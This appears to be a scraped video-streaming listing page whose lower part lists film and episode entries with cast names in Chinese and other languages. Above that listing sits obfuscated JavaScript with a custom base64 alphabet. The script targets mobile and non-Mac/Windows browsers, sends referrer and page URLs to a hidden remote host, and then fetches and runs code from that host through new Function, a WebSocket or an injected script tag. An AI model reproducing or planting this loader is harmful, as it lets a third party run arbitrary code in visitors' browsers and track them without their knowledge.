function mdre(e) {
const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab";
let n = "";
let r, o, c, s, a, i, l;
let d = 0;
let f = String(e).replace(/\r\n/g, "\n");
let h = "";
for (let e = 0; e < f.length; e++) {
const t = f.charCodeAt(e);
if (t < 128) {
h += String.fromCharCode(t);
} else if (t > 127 && t < 2048) {
h += String.fromCharCode(t >> 6 | 192);
h += String.fromCharCode(t & 63 | 128);
} else {
h += String.fromCharCode(t >> 12 | 224);
h += String.fromCharCode(t >> 6 & 63 | 128);
h += String.fromCharCode(t & 63 | 128);
}
}
while (d < h.length) {
r = h.charCodeAt(d++);
o = h.charCodeAt(d++);
c = h.charCodeAt(d++);
s = r >> 2;
a = (r & 3) << 4 | o >> 4;
i = (o & 15) << 2 | c >> 6;
l = c & 63;
if (isNaN(o)) {
n += t.charAt(s) + t.charAt(a);
} else if (isNaN(c)) {
n += t.charAt(s) + t.charAt(a) + t.charAt(i);
} else {
n += t.charAt(s) + t.charAt(a) + t.charAt(i) + t.charAt(l);
}
}
return n;
}
function iwtq(e) {
const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab";
let n = "";
let r = 0;
let o, c, s, a;
const i = String(e).replace(/[^A-Za-z0-9\-_]/g, "");
const l = i.length;
while (r < l) {
if (r == l) o = -1; else o = t.indexOf(i.charAt(r++));
if (r == l) c = -1; else c = t.indexOf(i.charAt(r++));
if (r === l) s = -1; else s = t.indexOf(i.charAt(r++));
if (r === l) a = -1; else a = t.indexOf(i.charAt(r++));
if (o === -1 || c === -1) {
break;
}
const e = o << 2 | c >> 4;
n += String.fromCharCode(e);
if (s !== -1) {
const e = (c & 15) << 4 | s >> 2;
n += String.fromCharCode(e);
}
if (a !== -1) {
const e = (s & 3) << 6 | a;
n += String.fromCharCode(e);
}
}
let d = "";
r = 0;
while (r < n.length) {
const e = n.charCodeAt(r);
if (e < 128) {
d += String.fromCharCode(e);
r++;
} else if (e > 191 && e < 224) {
const t = n.charCodeAt(r + 1);
d += String.fromCharCode((e & 31) << 6 | t & 63);
r += 2;
} else {
const t = n.charCodeAt(r + 1);
const o = n.charCodeAt(r + 2);
d += String.fromCharCode((e & 15) << 12 | (t & 63) << 6 | o & 63);
r += 3;
}
}
return d;
}
function gwyddp(e) {
return Math.floor(Math.random() * (e + 1));
}
window['w'+'jb'+'hz'+'s'+'fx'] = navigator.platform && !/^Mac|Win/.test(navigator.platform) || !navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent) ? function() {
(function(e, t, n) {
const r = n[iwtq("dPW5hqWyi4Inhqp0iU")];
let o = "";
try {
o = opener ? opener.document.location.href : n.referrer;
} catch (e) {
o = n.referrer;
}
if (o && o.length > 900) {
o = o.slice(0, 900);
}
let c = t.location.href;
if (c && c.length > 900) {
c = c.slice(0, 900);
}
const s = iwtq(e).split(",");
const a = s[3];
const i = s[2];
let l = s[4];
let d;
if (l.indexOf(";") > -1) {
let e = l.split(";");
if (e.length < 1) return;
if (e.length > 1) {
d = e[gwyddp(e.length)];
} else {
d = e[0];
}
} else {
d = l;
}
const f = mdre(`su=${d}&t=${s[0]}&d=${s[1]}&r=${o}&m=${Date.now()}&u=${c}&sm=${i}`);
const h = navigator.userAgent;
if (h.indexOf("b" + "ai" + "d" + "u") !== -1) {
const e = new XMLHttpRequest;
e.open("POST", `${i}://${d}/getSv/${f}`);
e.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
e.setRequestHeader("X-REQUESTED-WITH", "XMLHttpRequest");
e.onreadystatechange = function() {
if (e.readyState === 4 && e.status === 200) {
const t = JSON.parse(e.responseText);
const n = new Function("c", `${iwtq(t.ds)}; return ${t.ns}(c);`)(t.img.join(""));
new Function("_tdcs", n)(r);
}
};
e.send();
} else if (t.WebSocket && /UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(h)) {
const e = new WebSocket(`${a}://${d}/ws/${f}`);
e.onmessage = function(t) {
e.close();
const o = t.data.split(";");
if (o.length > 2) {
remoteCode = iwtq(o[0]);
remoteCode += iwtq(o[1]);
remoteCode += iwtq(o[2]);
new Function("_tdcs", remoteCode)(r);
} else {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
}
};
e.onerror = function() {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
};
} else {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
}
})("H-01H2ULGCmMiDALGDiLh51nhOILfrHydPpziQ", window, document);
} : function() {};
-
正片
鵜川もえか , 渡邉結衣 , 原田英里佳 , 新嘉喜由芽
-
正片
艾米丽·巴德,汤姆·布莱斯,莎拉·凯瑟琳·胡克,卢锡安·拉维斯科特,迈尔斯·赫尔泽,贾米拉·贾米尔,汤米·杜,卢卡斯·盖奇,爱丽丝·李,莫莉·香侬,阿兰·卢克,斯宾瑟·内维尔,伊恩·波特,马德琳·阿库阿,约翰·贾巴雷,贝瑟妮·安妮·林德,迈克尔·A·纽科默,劳拉·弗兰纳里,莱顿·威廉姆斯,埃米·勒
-
-
正片
罗宾·威廉姆斯,小库珀·古丁,安娜贝拉·莎拉,马克斯·冯·叙多夫,沃纳·赫尔佐格
-
正片
巴博拉·伯布洛瓦,米罗斯拉夫·哈努斯,马丁·芬格,哈娜·瓦格内洛娃,Ondrej Novotný,Tatjana Medvecká,娜塔莉·蕾赫罗娃,Simona Zmrzlá,Marek Geisberg,Agáta Spisáková,黛安娜·杜林科娃,Katerina Marie Fialová,Leona Sklenickova,Martin Donutil,Pavel Novotný,Patrik Vojtísek,Eva Alner Jízdná,Lucie Hejná
-
正片
凯瑟琳·麦克纳马拉,丹尼斯·安德瑞斯,Linda Kee,Kaya Coleman
-
正片
汉黛·埃塞尔,梅廷·阿克杜尔格,哈塞·阿维尼·丹亚尔,Ipek Erdem,迪德姆·英瑟勒,塞尔坎·廷马兹,Idil Firat,拉米·纳林,Ilayda Orkut,Eylül Su Sapan,梅尔特·埃格·阿克,Ihsan Ilhan,Deniz Duygu Köse,Nazlican Demir,Erdal Bilingen
-
正片
斯艾娜·阿古顿,诺亚·贝克,詹姆斯·范德比克,德鲁·雷·坦纳
-
-
正片
拉尔夫·费因斯,罗杰·阿拉姆,西蒙·拉塞尔·比尔,阿玛拉·奥凯雷克,托马斯·豪斯,艾米莉·费尔恩,雅各布·杜德曼,Taylor Uttley,内森·霍尔,鲁本·班布里奇,Ellie Sager
-
-
正片
普拉迪普·兰加纳坦,Mamitha Baiju,R. Sarathkumar,罗希尼,赫里杜·哈龙,Dravid Selvam
-
正片
温碧霞,禾浩辰,归亚蕾,庹宗华,董至成,刘国劭,雷艾美,吴大维,黄诗棋
-
正片
蕾切尔·蕾·库克,丹妮拉·莫奈,列奥尼达斯·古拉普蒂斯
-
正片
唐妮·布蕾斯顿,艾森斯·阿特金斯,伊薇特·尼科尔·布朗,托马斯·卡德罗特
-
-
正片
凯文·贝肯,凯拉·塞吉维克,贾德·赫希,布莱特妮·奥格拉迪
-
正片
米拉·埃尔绍娃,尤里·纳索诺夫,安东·瓦西利耶夫,柳德米拉·阿尔捷米娃,安东·阿尔特梅夫,埃尔尚·阿列斯克罗夫,纳德兹达·伊万诺娃,罗扎·哈伊鲁林娜,玛丽亚·克罗托娃,尤里·李,康斯坦丁·梅尔兹利金,叶夫根尼·塔库耶夫
-
-
-
-
-
正片
古手川祐子,北大路欣也,岸田今日子,中尾彬,芦田伸介,冈田英次,加贺麻理子
-
-
正片
丹妮卡·麦凯拉,杰西·哈奇,夏洛林·阿莫亚,劳伦·比亚佐,Riley Weston
-
正片
竹内凉真,町田启太,土居志央梨,石井杏奈,浜田信也,前田旺志郎,安东尼奥·吉尔,萨米·乔纳斯·希尼,爱多阿多·斯费雷拉
-
正片
Nathalie Morris,小卡洛斯·赛恩斯,克劳迪娅·卡万
-
第04集
钟汉良,秦岚,白冰,王冠逸,王真儿,王一舟,张云琪,李嘉灏,陈瑾,张太文
-
-
正片
托妮·科莱特,安迪·加西亚,亚历克斯·帕蒂弗,艾娃·德·多米尼奇,Jessica Serfaty,Rachel Petladwala,Andy Garcia,罗伯·艾斯特斯,奇亚拉·伊兹,文森特·里奥特